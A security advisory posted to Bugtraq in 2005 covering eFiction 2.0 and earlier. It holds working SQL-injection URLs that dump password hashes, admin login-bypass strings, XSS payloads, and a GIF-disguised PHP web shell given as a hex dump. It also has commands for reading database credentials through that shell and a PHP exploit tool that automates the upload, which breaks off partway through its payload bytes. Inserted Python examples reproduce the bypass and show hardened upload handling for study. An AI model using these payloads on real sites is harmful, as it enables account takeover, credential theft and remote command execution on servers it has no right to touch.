eFiction <= 2.0 multiple vulnerabilities

retrogod_at_aliceposta.it
Date: 11/25/05

    Date: 25 Nov 2005 11:22:11 -0000
    To: bugtraq@securityfocus.com
    
    
    efiction <= 2.0 remote code execution / SQL injection / login bypass / cross site scripting / path & information disclosure

    software:
    site: http://www.efiction.wallflowergirl.com/index.php
    description: "Efiction is a software program that enables users to run automated original or fanfiction
    archives on their websites. The program is PHP and MySQL database driven and is released as open-source software."

    i)
    xss:
    efiction 1.0/1.1:
    http://[target]/efiction/titles.php?action=viewlist&let=<script>alert(document.cookie)</script>
    on version 2.0, the same XSS through SQL injection (the injected string is rendered in the title list):
    http://[target]/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,'<script>alert(document.cookie)</script>',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/*

    ii)
    if magic_quotes_gpc off -> SQL injection:
    the MD5 password hash of any admin/user is displayed on screen

    efiction 1.0:
    http://[target]/[path]/authors.php?action=viewlist&let='%20UNION%20SELECT%20password,0%20FROM%20fanfiction_authors/*
    http://[target]/[path]/authors.php?action=viewlist&let=%27%20UNION%20SELECT%20password,password%20FROM%20efiction_fanfiction_authors/*&offset=0,40/*
    http://[target]/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/*
    http://[target]/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/*
    http://[target]/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,penname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/*

    efiction 1.1:
    http://[target]/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname%20FROM%20fanfiction_authors%20/*
    http://[target]/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%20password,0,0,0,0,0,penname,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/*
    http://[target]/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%20penname,0,0,0,0,0,0,0,0,0,password,0,0,0,0%20FROM%20fanfiction_authors%20/*
    http://[target]/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,0,0,0,0,0,0,0,0,password,0,0,0,0%20FROM%20efiction_fanfiction_authors%20/*
    http://[target]/[path]/viewuser.php?uid='UNION%20SELECT%200,0,0,0,0,0,0,0,0,0,password,0,0,0,0%20FROM%20fanfiction_authors%20/*
    http://[target]/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20efiction_fanfiction_authors%20/*
    http://[target]/[path]/viewstory.php?sid='%20UNION%20SELECT%20penname,penname,password,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname%20FROM%20fanfiction_authors%20/*

    efiction 2.0
    http://[target]/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/*

    iii)
    if magic_quotes_gpc off -> login bypass:
    you can log in as admin by entering:

    efiction 1.0:
    username: 'UNION SELECT 'd41d8cd98f00b204e9800998ecf8427e',penname,uid,userskin,level,email FROM fanfiction_authors where level=1/*
    password: [nothing]

    efiction 1.1:
    username: 'UNION SELECT 'd41d8cd98f00b204e9800998ecf8427e',penname,uid,userskin,level,email,categories FROM fanfiction_authors where level=1/*
    password: [nothing]

    efiction 2.0:
    username: 'UNION SELECT 'd41d8cd98f00b204e9800998ecf8427e',penname,uid,userskin,level,email,categories,ageconsent FROM fanfiction_authors where level=1/*
    password: [nothing]

    (d41d8cd98f00b204e9800998ecf8427e is the MD5 hash of the empty string, so the
    injected row matches an empty password; the UNION must return as many columns
    as the original SELECT, which is why each version needs a different field list)
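    Worked example, added here and not part of rgod's advisory: a Python/sqlite3 stand-in for the login query that sections ii) and iii) attack. The table, its rows, the six-column SELECT and the "fetch the hash, then compare with md5() in PHP" step are assumptions drawn from the shape of the payloads above (eFiction's real query is not on this page). It shows why the number of 0s in each UNION payload differs per page and version, runs the 1.0 login-bypass string verbatim against the concatenated query, and contrasts it with a parameterised version. It does not emulate magic_quotes_gpc: SQLite does not treat backslash as a string escape the way MySQL does, so addslashes() cannot be modelled faithfully here.

```python
import hashlib
import sqlite3

# Constructed schema. The advisory's login payload ('UNION SELECT '<hash>',penname,uid,
# userskin,level,email FROM fanfiction_authors where level=1/*) implies that the login
# query selects those six columns by penname and that PHP then compares the fetched
# hash with md5() of the submitted password. The real eFiction query is not on the
# page, so the column list and the comparison step are assumptions.
LOGIN_COLUMNS = "password, penname, uid, userskin, level, email"
TABLE = "fanfiction_authors"   # default prefix; the 1.1+ installer may change it


def md5hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the MySQL table: one admin (level=1), one member."""
    con = sqlite3.connect(":memory:")
    con.execute(f"CREATE TABLE {TABLE} (uid INTEGER, penname TEXT, password TEXT, "
                "userskin TEXT, level INTEGER, email TEXT)")
    con.executemany(f"INSERT INTO {TABLE} VALUES (?,?,?,?,?,?)", [
        (1, "admin",  md5hex("correct horse"), "default", 1, "admin@example.invalid"),
        (2, "reader", md5hex("hunter2"),       "default", 0, "reader@example.invalid"),
    ])
    return con


def login_vulnerable(con, username: str, password: str):
    """Query built by string concatenation, as the payloads require. Returns the
    matched row or None. With magic_quotes_gpc off the quote in `username` reaches
    the database unescaped and the UNION row replaces the admin's real hash."""
    sql = f"SELECT {LOGIN_COLUMNS} FROM {TABLE} WHERE penname='{username}'"
    row = con.execute(sql).fetchone()
    if row is not None and row[0] == md5hex(password):
        return row
    return None


def login_fixed(con, username: str, password: str):
    """Same logic with a bound parameter: the quote is data, never syntax, so the
    UNION payload is looked up as a (non-existent) penname and nothing comes back."""
    sql = f"SELECT {LOGIN_COLUMNS} FROM {TABLE} WHERE penname=?"
    row = con.execute(sql, (username,)).fetchone()
    if row is not None and row[0] == md5hex(password):
        return row
    return None


def probe_column_count(con, max_cols: int = 12):
    """Why the advisory's UNION payloads carry a different number of 0s per page and
    version: both sides of a UNION must return the same number of columns. Count up
    until the database stops raising a column-count error (MySQL: 'The used SELECT
    statements have a different number of columns'; SQLite words it differently)."""
    for n in range(1, max_cols + 1):
        payload = "' UNION SELECT " + ",".join(["0"] * n) + f" FROM {TABLE} /*"
        try:
            con.execute(f"SELECT {LOGIN_COLUMNS} FROM {TABLE} WHERE penname='{payload}'")
            return n
        except sqlite3.OperationalError:
            continue
    return None


# The advisory's eFiction 1.0 login payload, verbatim: the first column is md5("") so
# an empty password matches; 'where level=1' picks the admin row; '/*' comments out
# the closing quote the application appends.
BYPASS_USERNAME = ("'UNION SELECT 'd41d8cd98f00b204e9800998ecf8427e',penname,uid,userskin,"
                   f"level,email FROM {TABLE} where level=1/*")

if __name__ == "__main__":
    con = make_db()
    print("columns in the login SELECT:", probe_column_count(con))
    print("vulnerable login as:", login_vulnerable(con, BYPASS_USERNAME, ""))
    print("parameterised login:", login_fixed(con, BYPASS_USERNAME, ""))
```

    Run it with python3. The column-count probe is the same thing you would do by hand against titles.php or viewstory.php before writing a UNION for a page whose SELECT you cannot see; the parameterised variant is the fix, independent of magic_quotes.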

    iv)

    remote code execution (1.0/1.1/2.0):

    register (a temporary password is e-mailed to you), log in, go to "Manage Images"
    (or go to http://target/path/user.php?action=manageimages&upload=upload), choose "Upload new image"
    and upload a cmd.php that starts with a GIF header, like this one (hexadecimal dump):

    00000000:47 49 46 38 39 61 01 00 01 00 f7 00 00 a4 b6 a4 GIF89a......
    00000010:16 00 00 f4 00 00 77 00 00 6b 00 4c 15 00 00 f4 .....w..k.L...
    00000020:00 69 77 00 00 f8 00 6e 62 00 00 15 00 67 00 00 .iw...nb....g..
    00000030:00 34 00 75 00 00 00 00 00 61 c0 00 00 00 00 00 .4.u.....a.....
    00000040:00 00 00 00 00 00 00 00 00 89 00 00 1c 00 00 00 ...............
    00000050:00 00 00 00 00 a9 00 00 20 00 00 00 00 00 00 00 ....... .......
    00000060:00 6f 00 00 00 00 00 00 00 00 00 00 00 56 00 00 .o...........V..
    00000070:00 00 00 3c 3f 70 68 70 20 65 72 72 6f 72 5f 72 ...<?php error_r
    00000080:65 70 6f 72 74 69 6e 67 28 30 29 3b 69 6e 69 5f eporting(0);ini_
    00000090:73 65 74 28 22 6d 61 78 5f 65 78 65 63 75 74 69 set("max_executi
    000000a0:6f 6e 5f 74 69 6d 65 22 2c 30 29 3b 73 79 73 74 on_time",0);syst
    000000b0:65 6d 28 24 5f 47 45 54 5b 63 6d 64 5d 29 3b 3f em($_GET[cmd]);?
    000000c0:3e 38 00 00 e5 00 00 12 00 00 00 00 00 00 00 98 >8............
    000000d0:01 00 cc 00 00 15 00 00 00 58 00 10 e6 00 04 12 ........X.....
    000000e0:00 10 00 00 04 05 00 01 90 00 00 f6 00 00 77 00 ............w.
    000000f0:00 c8 00 10 d5 00 e8 f5 00 12 77 00 00 ff 00 13 ......w....
    00000100:ff 00 6c ff 00 6c ff 00 74 6a 00 03 16 00 00 f4 .l.l.tj.....
    00000110:00 00 77 00 00 c4 00 30 1e 00 75 e5 00 15 77 00 ..w...0..u..w.
    00000120:00 00 00 00 00 00 00 15 00 00 00 00 00 00 00 dc ...............
    00000130:00 00 e7 00 00 12 00 00 00 70 00 01 59 00 00 18 ........p..Y...
    00000140:00 00 00 00 00 04 00 88 01 00 e8 05 00 12 01 00 ..............
    00000150:00 6c 00 04 e3 00 42 12 00 6e 00 00 74 7e 00 30 .l...B..n..t~.0
    00000160:00 00 87 00 00 6e c0 00 74 00 00 ff 00 00 ff 00 ....n.t.....
    00000170:00 ff 00 00 ff ff 00 d6 ff 00 32 ff 00 6e ff 00 .....2.n.
    00000180:74 ff 00 6c ff 00 5b ff 00 e5 ff 00 77 00 00 53 t.l.[..w..S
    00000190:00 00 15 00 00 53 00 00 00 00 00 00 00 00 00 00 .....S..........
    000001a0:00 00 00 00 00 00 00 07 00 00 00 00 00 00 00 00 ................
    000001b0:00 6b 00 00 00 00 00 00 00 00 00 00 00 58 00 00 .k...........X..
    000001c0:03 00 f0 00 00 15 00 00 00 06 00 00 f6 00 00 e4 .............
    000001d0:00 00 77 00 00 0f 00 00 1e 00 00 e5 00 00 77 00 ..w..........w.
    000001e0:00 00 00 00 01 00 00 00 00 00 00 00 00 f8 74 00 .............t.
    000001f0:62 e7 00 01 12 00 00 00 00 00 c8 68 00 28 32 15 b........h.(2.
    00000200:e5 e6 00 77 77 a4 00 ff e5 00 ff 12 00 ff 00 00 .ww......
    00000210:ff 00 00 6c 00 00 5b 00 00 e5 00 00 77 fc f8 36 ..l..[....w6
    00000220:f7 62 00 12 15 00 00 00 00 05 00 36 90 01 00 f6 b.........6..
    00000230:00 00 77 00 00 c8 04 d8 d5 29 ed f5 e5 12 77 77 ..w...).ww
    00000240:00 ff 94 ff ff e7 ff ff 12 ff ff 00 ff 6a 64 00 ...jd.
    00000250:16 2f 00 f4 e6 00 77 77 00 e0 00 9c 18 00 e8 e5 ./..ww....
    00000260:00 12 77 00 00 00 ff 4e 00 ff 21 15 ff 4c 00 ff ..w...N.!.L.
    00000270:00 00 6f 7c 00 10 e8 00 e5 12 00 77 00 f8 00 7b ..o|.....w..{
    00000280:62 00 e0 15 00 4e 00 00 00 00 98 b0 01 e8 e8 00 b...N......
    00000290:12 12 00 00 00 64 98 6f 2f 10 10 e6 e5 e5 77 77 .....do/..ww
    000002a0:77 00 10 52 00 e4 e9 00 4e 12 00 00 00 61 20 c8 w..R..N....a
    000002b0:00 02 ff 6c 4f ff 00 00 7f 69 00 1c 00 01 e9 61 ..lO..i....a
    000002c0:00 12 00 00 00 29 94 00 00 e7 00 00 12 00 00 00 .....)........
    000002d0:00 00 00 6f 00 01 10 00 00 e5 00 00 77 00 a0 00 ...o.......w. .
    000002e0:00 3a 00 00 50 00 00 00 00 00 00 01 00 30 00 00 .:..P........0..
    000002f0:00 00 00 69 00 00 61 60 00 74 f1 00 74 15 00 69 ...i..a`.t.t..i
    00000300:00 00 00 f0 00 00 aa 00 02 47 00 00 00 21 f9 04 .......G...!.
    00000310:00 00 00 00 00 2c 00 00 00 00 01 00 01 00 07 08 .....,..........
    00000320:04 00 01 04 04 00 3b ......;

    a smaller gif will do as well, try it
    the uploaded file is reachable at:

    http://[target]/[path_to_efiction]/stories/[your_username]/images/cmd.php
    (efiction 1.0/1.1)

    or

    http://[target]/[path_to_efiction]/stories/[user_id]/images/cmd.php
    ex:
    http://[target]/[path_to_efiction]/stories/1/images/cmd.php
    http://[target]/[path_to_efiction]/stories/2/images/cmd.php
    (efiction 2.0)

    now you can run commands, redirecting their output to a temporary file:

    http://[target]/[path_to_efiction]/stories/[your_username]/images/cmd.php?cmd=ls%20-la>README
    http://[target]/[path_to_efiction]/stories/[your_username]/images/README

    to see database username & password:

    http://[target]/[path_to_efiction]/stories/[your_username]/images/cmd.php?cmd=cat%20../../../data/dbconfig.php>README
    http://[target]/[path_to_efiction]/stories/[your_username]/images/README

    to see database table prefix and various settings:
    http://[target]/[path_to_efiction]/stories/[your_username]/images/cmd.php?cmd=cat%20../../../config.php>README
    http://[target]/[path_to_efiction]/stories/[your_username]/images/README

    notes: in efiction 1.0/1.1 members are NOT allowed to upload images by default;
           in efiction 2.0 they are.
           from efiction 1.1 on, the installer lets you choose a different table prefix: if the
           queries above fail, try efiction_fanfiction_authors, etc.
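    Worked example for section iv), added here and not rgod's code: it builds the "smaller gif" the advisory hints at (a valid 1x1 GIF89a with the PHP carried in a comment extension block; the image bytes are my own construction), walks the file as a decoder would to show that signature or structure checks accept it, and puts hardened upload handling beside it: discard the client's filename (the exploit sends C:\suntzu.php), allow-list a single extension, generate the stored name server-side. The allow-list and naming functions are illustrative, not eFiction's. Whatever the check, the upload directory must not be served with PHP execution enabled; that is web-server configuration and is outside the snippet.

```python
import secrets
from typing import List, Optional, Tuple

ALLOWED_EXT = {"gif", "jpg", "jpeg", "png"}   # illustrative allow-list, not eFiction's


def build_gif_polyglot(payload: bytes) -> bytes:
    """A 1x1 GIF89a that is valid end to end, with `payload` carried in a comment
    extension (0x21 0xFE, length-prefixed sub-blocks of up to 255 bytes each)."""
    header = (b"GIF89a"                       # signature + version
              + b"\x01\x00\x01\x00"           # logical screen 1x1
              + b"\x80\x00\x00"               # global colour table, 2 entries
              + b"\xff\xff\xff\x00\x00\x00")  # white, black
    comment = b"\x21\xfe"
    for i in range(0, len(payload), 255):
        chunk = payload[i:i + 255]
        comment += bytes([len(chunk)]) + chunk
    comment += b"\x00"                        # block terminator
    image = (b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00"  # image descriptor, 1x1
             + b"\x02"                                    # LZW minimum code size
             + b"\x02\x44\x01\x00")                       # clear, pixel 0, end
    return header + comment + image + b"\x3b"             # trailer


def walk_gif(data: bytes) -> List[Tuple[str, bytes]]:
    """Minimal GIF block walker; raises ValueError on a malformed file. A file that
    survives this is a real image as far as a decoder is concerned, which is why
    'is it really a GIF?' validation cannot keep PHP out of the upload directory."""
    if len(data) < 13 or data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("bad signature")
    pos, packed = 13, data[10]                # after the logical screen descriptor
    if packed & 0x80:                         # skip the global colour table
        pos += 3 << ((packed & 0x07) + 1)

    def sub_blocks(p: int) -> Tuple[bytes, int]:
        out = b""
        while data[p] != 0:
            n = data[p]
            out += data[p + 1:p + 1 + n]
            p += 1 + n
        return out, p + 1

    blocks: List[Tuple[str, bytes]] = []
    while pos < len(data):
        tag = data[pos]
        if tag == 0x3B:
            blocks.append(("trailer", b""))
            return blocks
        if tag == 0x21:                       # extension: label byte, then sub-blocks
            label = data[pos + 1]
            body, pos = sub_blocks(pos + 2)
            blocks.append(("comment" if label == 0xFE else "extension", body))
        elif tag == 0x2C:                     # image descriptor, 10 bytes
            ipacked = data[pos + 9]
            pos += 10
            if ipacked & 0x80:                # local colour table
                pos += 3 << ((ipacked & 0x07) + 1)
            body, pos = sub_blocks(pos + 1)   # +1 skips the LZW minimum code size
            blocks.append(("image", body))
        else:
            raise ValueError(f"unexpected byte 0x{tag:02x} at offset {pos}")
    raise ValueError("no trailer")


def magic_says_gif(data: bytes) -> bool:
    """What a signature-only upload filter checks. The polyglot passes."""
    return data[:6] in (b"GIF87a", b"GIF89a")


def contains_php_tag(data: bytes) -> bool:
    """Content scan for an opening PHP tag: a useful second layer, not a fix, because
    the interpreter, not the image format, decides what runs."""
    return b"<?" in data


def safe_store_name(client_filename: str) -> Optional[str]:
    """Hardened naming: drop the client's path and basename, require exactly one
    extension from the allow-list, and choose the stored name server-side."""
    base = client_filename.replace("\\", "/").rsplit("/", 1)[-1]
    parts = base.lower().split(".")
    if len(parts) != 2 or not parts[0] or parts[1] not in ALLOWED_EXT:
        return None                           # rejects cmd.php and cmd.php.gif alike
    return secrets.token_hex(8) + "." + parts[1]


if __name__ == "__main__":
    shell = build_gif_polyglot(b'<?php error_reporting(0);system($_GET["cmd"]);?>')
    print("signature check passes:", magic_says_gif(shell))
    print("blocks:", [(kind, len(body)) for kind, body in walk_gif(shell)])
    print("php tag found:", contains_php_tag(shell))
    print("stored as:", safe_store_name("C:\\suntzu.php"), safe_store_name("photo.GIF"))
```

    The comment block is only one place to hide the payload; the advisory's own file puts it inside colour-table bytes, which is just as valid. That is the point: validate the name you will store under, never the content you were handed, and keep the interpreter away from the directory.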

    v) path disclosure:
    http://[target]/efiction/storyblock.php

    vi) information disclosure:

    a phpinfo page sits under the efiction path:
    http://[target]/[path]/phpinfo.php

    vii) also check whether install.php or upgrade.php have been left in place; they can be used to perform some actions on the site/database

    this is the exploit tool for iv) :

    <?php
    # ---efiction20_xpl.php 15.19 17/11/2005 #
    # #
    # eFiction <= 2.0 fake GIF Shell Upload #
    # coded by rgod #
    # site: http://rgod.altervista.org #
    # #
    # usage: launch from Apache, fill in requested fields, then go! #
    # #
    # Sun-Tzu: "If fighting is sure to result in victory, then you must fight, #
    # even though the ruler forbid it; if fighting will not result in victory, #
    # then you must not fight even at the ruler's bidding." #

    error_reporting(0);
    ini_set("max_execution_time",0);
    ini_set("default_socket_timeout", 2);
    ob_implicit_flush (1);

    echo'<html><head><title> ******** eFiction <= 2.0 remote commands xctn *********
    </title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
    <style type="text/css"> body {background-color:#111111; SCROLLBAR-ARROW-COLOR:
    #ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img
    {background-color: #FFFFFF !important} input {background-color: #303030
    !important} option { background-color: #303030 !important} textarea
    {background-color: #303030 !important} input {color: #1CB081 !important} option
    {color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox
    {background-color: #303030 !important} select {font-weight: normal; color:
    #1CB081; background-color: #303030;} body {font-size: 8pt !important;
    background-color: #111111; body * {font-size: 8pt !important} h1 {font-size:
    0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em
    !important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em
    !important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em
    !important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
    normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
    { text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
    color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;
    font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;
    font-weight:bold; font-style: italic;}--></style></head><body><p class="Stile6">
    ********* eFiction <= 2.0 remote commands xctn **********</p><p class="Stile6">a
    script by rgod at <a href="http://rgod.altervista.org"target="_blank">
    http://rgod.altervista.org></p><table width="84%"><tr><td width="43%"> <form
    name="form1" method="post" action="'.htmlspecialchars($_SERVER['PHP_SELF']).'"> <p><input
    type="text" name="host"> <span class="Stile5">* hostname (ex:www.sitename.com)
    </span></p> <p><input type="text" name="path"> <span class="Stile5">* path (ex:
    /efiction/ or just / ) </span></p><p><input type="text" name="command"> <span
    class="Stile5"> * specify a command , "cat ../../../data/dbconfig.php" to see
    database user & password </span></p> <p><input type="text" name="username"><span
    class="Stile5"> * username...</span> </p> <p> <input type="password"
    name="password"><span class="Stile5">* ... and password to eFiction, required to
    upload the fake gif </span> </p> <p> <input type="text" name="port">
    <span class="Stile5">specify a port other than 80 ( default value )</span>
    </p> <p> <input type="text" name="proxy"><span class="Stile5"> send exploit
    through an HTTP proxy (ip:port)</span></p><p><input type="submit" name="Submit"
    value="go!"></p></form> </td></tr></table></body></html>';

    function show($headeri)
    {
    $ii=0;
    $ji=0;
    $ki=0;
    $ci=0;
    echo '<table border="0"><tr>';
    while ($ii <= strlen($headeri)-1)
    {
    $datai=dechex(ord($headeri[$ii]));
    if ($ji==16) {
                 $ji=0;
                 $ci++;
                 echo "<td>&nbsp;&nbsp;</td>";
                 for ($li=0; $li<=15; $li++)
                          { echo "<td>".$headeri[$li+$ki]."</td>";
                                }
                $ki=$ki+16;
                echo "</tr><tr>";
                }
    if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
    {echo "<td>".$datai."</td> ";}
    $ii++;
    $ji++;
    }
    for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
                          { echo "<td>&nbsp&nbsp</td>";
                           }

    for ($li=$ci*16; $li<=strlen($headeri); $li++)
                          { echo "<td>".$headeri[$li]."</td>";
                                }
    echo "</tr></table>";
    }
    $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

    function sendpacket() //if you have sockets module loaded, 2x speed! if not,load
                                  //next function to send packets
    {
      global $proxy, $host, $port, $packet, $html, $proxy_regex;
      $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
      if ($socket < 0) {
                       echo "socket_create() failed: reason: " . socket_strerror($socket) . "<br>";
                       }
                  else
                       { $c = preg_match($proxy_regex,$proxy);
                  if (!$c) {echo 'Not a valid proxy...';
                            die;
                           }
                        echo "OK.<br>";
                        echo "Attempting to connect to ".$host." on port ".$port."...<br>";
                        if ($proxy=='')
                       {
                         $result = socket_connect($socket, $host, $port);
                       }
                       else
                       {

                       $parts =explode(':',$proxy);
                       echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
                       $result = socket_connect($socket, $parts[0],$parts[1]);
                       }
                       if ($result < 0) {
                                         echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "<br><br>";
                                        }
                                   else
                                        {
                                         echo "OK.<br><br>";
                                         $html= '';
                                         socket_write($socket, $packet, strlen($packet));
                                         echo "Reading response:<br>";
                                         while ($out= socket_read($socket, 2048)) {$html.=$out;}
                                         echo nl2br(htmlentities($html));
                                         echo "Closing socket...";
                                         socket_close($socket);

                                        }
                      }
    }
    function sendpacketii($packet)
    {
    global $proxy, $host, $port, $html, $proxy_regex;
    if ($proxy=='')
          {$ock=fsockopen(gethostbyname($host),$port);
           if (!$ock) { echo 'No response from '.htmlentities($host);
                            die; }
          }
                 else
               {
               $c = preg_match($proxy_regex,$proxy);
                  if (!$c) {echo 'Not a valid proxy...';
                            die;
                           }
               $parts=explode(':',$proxy);
                echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
                $ock=fsockopen($parts[0],$parts[1]);
                if (!$ock) { echo 'No response from proxy...';
                            die;
                           }
               }
    fputs($ock,$packet);
    if ($proxy=='')
      {

        $html='';
        while (!feof($ock))
          {
            $html.=fgets($ock);
          }
      }
    else
      {
        $html='';
        while ((!feof($ock)) or (strpos($html,"\r\n\r\n")===false)) // eregi() is gone in PHP 7+
        {
          $html.=fread($ock,1);
        }
      }
    fclose($ock);
    echo nl2br(htmlentities($html));
    }

    $host=$_POST['host'];$path=$_POST['path'];$username=$_POST['username'];
    $password=$_POST['password'];$port=$_POST['port'];$command=$_POST['command'];
    $proxy=$_POST['proxy'];

    if (($host<>'') and ($path<>'') and ($username<>'') and ($password<>'') and ($command<>''))
    {
    $port=intval(trim($port));
    if ($port=='') {$port=80;}
    if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
    if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
    $host=str_replace("\r\n","",$host);
    $path=str_replace("\r\n","",$path);

    #STEP 1 -> Login
    $data='-----------------------------7d53102423092a
    Content-Disposition: form-data; name="penname"

    '.$username.'
    -----------------------------7d53102423092a
    Content-Disposition: form-data; name="password"

    '.$password.'
    -----------------------------7d53102423092a
    Content-Disposition: form-data; name="submit"

    Submit
    -----------------------------7d53102423092a--';

    $packet="POST ".$p."user.php HTTP/1.1\r\n";
    $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
    $packet.="Referer: http://".$host.":".$port.$path."user.php\r\n";
    $packet.="Accept-Language: en\r\n";
    $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d53102423092a\r\n";
    $packet.="Accept-Encoding: text/plain\r\n";
    $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
    $packet.="Host: ".$host.":".$port."\r\n";
    $packet.="Content-Length: ".strlen($data)."\r\n";
    $packet.="Connection: Close\r\n";
    $packet.="Cache-Control: no-cache\r\n\r\n";
    $packet.=$data;
    show($packet);
    sendpacketii($packet);
    $temp=explode("Set-Cookie: ",$html);
    $temp2=explode(' ',$temp[1]);
    $COOKIE=$temp2[0];
    echo '<br>Your cookie: '.htmlentities($COOKIE);

    #STEP 2 -> Upload a shell...
    $SHELL=
    chr(0x47).chr(0x49).chr(0x46).chr(0x38).chr(0x39).chr(0x61).
    chr(0x01).chr(0x00).chr(0x01).chr(0x00).chr(0xf7).chr(0x00).
    chr(0x00).chr(0xa4).chr(0xb6).chr(0xa4).chr(0x16).chr(0x00).
    chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
    chr(0x00).chr(0x6b).chr(0x00).chr(0x4c).chr(0x15).chr(0x00).
    chr(0x00).chr(0xf4).chr(0x00).chr(0x69).chr(0x77).chr(0x00).
    chr(0x00).chr(0xf8).chr(0x00).chr(0x6e).chr(0x62).chr(0x00).
    chr(0x00).chr(0x15).chr(0x00).chr(0x67).chr(0x00).chr(0x00).
    chr(0x00).chr(0x34).chr(0x00).chr(0x75).chr(0x00).chr(0x00).
    chr(0x00).chr(0x00).chr(0x00).chr(0x61).chr(0xc0).chr(0x00).
    chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
    chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
    chr(0x00).chr(0x89).chr(0x00).chr(0x00).chr(0x1c).chr(0x00).
    chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
    chr(0x00).chr(0xa9).chr(0x00).chr(0x00).chr(0x20).chr(0x00).
    chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
    chr(0x00).chr(0x6f).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
    chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
    chr(0x00).chr(0x56).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
    chr(0x00).chr(0x3c).chr(0x3f).chr(0x70).chr(0x68).chr(0x70).
    chr(0x20).chr(0x65).chr(0x72).chr(0x72).chr(0x6f).chr(0x72).
    chr(0x5f).chr(0x72).chr(0x65).chr(0x70).chr(0x6f).chr(0x72).
    chr(0x74).chr(0x69).chr(0x6e).chr(0x67).chr(0x28).chr(0x30).
    chr(0x29).chr(0x3b).chr(0x69).chr(0x6e).chr(0x69).chr(0x5f).
    chr(0x73).chr(0x65).chr(0x74).chr(0x28).chr(0x22).chr(0x6d).
    chr(0x61).chr(0x78).chr(0x5f).chr(0x65).chr(0x78).chr(0x65).
    chr(0x63).chr(0x75).chr(0x74).chr(0x69).chr(0x6f).chr(0x6e).
    chr(0x5f).chr(0x74).chr(0x69).chr(0x6d).chr(0x65).chr(0x22).
    chr(0x2c).chr(0x30).chr(0x29).chr(0x3b).chr(0x73).chr(0x79).
    chr(0x73).chr(0x74).chr(0x65).chr(0x6d).chr(0x28).chr(0x24).
    chr(0x5f).chr(0x47).chr(0x45).chr(0x54).chr(0x5b).chr(0x63).
    chr(0x6d).chr(0x64).chr(0x5d).chr(0x29).chr(0x3b).chr(0x3f).
    chr(0x3e).chr(0x38).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).
    chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
    chr(0x00).chr(0x00).chr(0x00).chr(0x98).chr(0x01).chr(0x00).
    chr(0xcc).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00).
    chr(0x00).chr(0x58).chr(0x00).chr(0x10).chr(0xe6).chr(0x00).
    chr(0x04).chr(0x12).chr(0x00).chr(0x10).chr(0x00).chr(0x00).
    chr(0x04).chr(0x05).chr(0x00).chr(0x01).chr(0x90).chr(0x00).
    chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
